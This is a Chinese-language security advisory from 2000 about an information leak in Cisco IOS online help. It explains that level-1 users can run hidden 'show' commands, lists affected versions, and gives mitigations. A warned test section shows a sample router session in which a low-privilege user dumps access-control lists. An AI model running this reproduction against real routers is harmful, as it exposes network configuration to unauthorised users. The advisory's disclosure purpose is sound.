首页 -> 安全研究
安全研究
安全漏洞
Cisco 路由器在线帮助漏洞泄漏敏感信息
发布日期:2000-05-07
更新日期:2000-05-08
受影响系统:
Cisco IOS 9.14描述:
Cisco IOS 12.0.7
Cisco IOS 12.0.6
Cisco IOS 12.0.5
Cisco IOS 12.0.4T
Cisco IOS 12.0.4S
Cisco IOS 12.0.4
Cisco IOS 12.0.3T2
Cisco IOS 12.0.2XG
Cisco IOS 12.0.2XF
Cisco IOS 12.0.2XD
Cisco IOS 12.0.2XC
Cisco IOS 12.0.2
Cisco IOS 12.0.1XE
Cisco IOS 12.0.1XB
Cisco IOS 12.0.1XA3
Cisco IOS 12.0.1W
Cisco IOS 12.0T
Cisco IOS 12.0S
Cisco IOS 12.0DB
Cisco IOS 12.0(9)S
Cisco IOS 12.0(8)
Cisco IOS 12.0(7)T
Cisco IOS 12.0(5)T1
Cisco IOS 12.0
Cisco IOS 11.2.9XA
Cisco IOS 11.2.9P
Cisco IOS 11.2.8SA5
Cisco IOS 11.2.8SA3
Cisco IOS 11.2.8SA1
Cisco IOS 11.2.8P
Cisco IOS 11.2.8
Cisco IOS 11.2.4F1
Cisco IOS 11.2.10BC
Cisco IOS 11.2.10
Cisco IOS 11.2P
Cisco IOS 11.2(17)
Cisco IOS 11.2
Cisco IOS 11.1.17CT
Cisco IOS 11.1.17CC
Cisco IOS 11.1.16IA
Cisco IOS 11.1.16AA
Cisco IOS 11.1.16
Cisco IOS 11.1.15CA
Cisco IOS 11.1.13IA
Cisco IOS 11.1.13CA
Cisco IOS 11.1.13AA
Cisco IOS 11.1.13
Cisco IOS 11.1
Cisco Router 7500.0
Cisco Router 7200.0
Cisco Router 4000.0
Cisco Router 3600.0
Cisco Router 2600.0
Cisco Router 2500.0
很多Cisco路由器IOS的在线帮助系统中存在一个问题,可能泄漏敏感信息。这个漏洞允许某个低等级用
户(例如,并不知道'enable'口令的用户)利用帮助系统去察看一些信息,而这些信息理论上应该只有那
些知道'enable'口令的用户才能看到的。这些信息包括访问控制列表以及其他的一些内容。
通常以低等级用户登陆之后(等级为1),用"show ?"只能看到一部分的show 命令列表。而对于'enable'
用户来说,他就可以看到全部的命令。在一台运行IOS 12.0(5)的3640路由器上,一共有75个show命令。
而在'disable'模式下的用户用"show ?"只能看到其中一部分。但是这只是帮助系统没有显示这些命令而
已。实际上它们仍然是存在而且可执行的,只有13个确实受到了限制,其他62个仍然可以执行。例如:
"show access-lists","show ip","show cdp", "show logging", "show cdp", "show vlans"等,尽管
帮助系统没有显示,但是仍然是可以执行的。这可能导致泄漏一些敏感信息给低级用户(也可能是一些
潜在的攻击者).
<* 来源: Fernando Montenegro fsmontenegro@iname.com
Claudio Silotto (csilotto@hotmail.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Username: joeuser
Password: <password>
Router2>sh priv
Current privilege level is 1
Router2>
运行show ?:
Router2>show ?
backup Backup status
cef Cisco Express Forwarding
clock Display the system clock
dialer Dialer parameters and statistics
flash: display information about flash: file
system
history Display the session command history
...
我们注意到帮助系统并没有显示"access-lists"参数,但实际上我们可以直接执行这个命令:
Router2>show privilege
Current privilege level is 1
Router2>show access-lists
Standard IP access list 10
permit 172.16.0.1
deny any
Extended IP access list eth0-IN
permit udp host 172.16.0.1 10.11.12.0 0.0.0.255 eq
snmp (14982 matches)
permit udp host 172.16.0.1 10.11.13.128 0.0.0.127 eq
snmp (4026 matches)
....
建议:
- 设置缺省登陆等级为0
- 使用"privilege exec"来指定0级用户可以执行的命令
浏览次数:6923
严重程度:0(网友投票)
绿盟科技给您安全的保障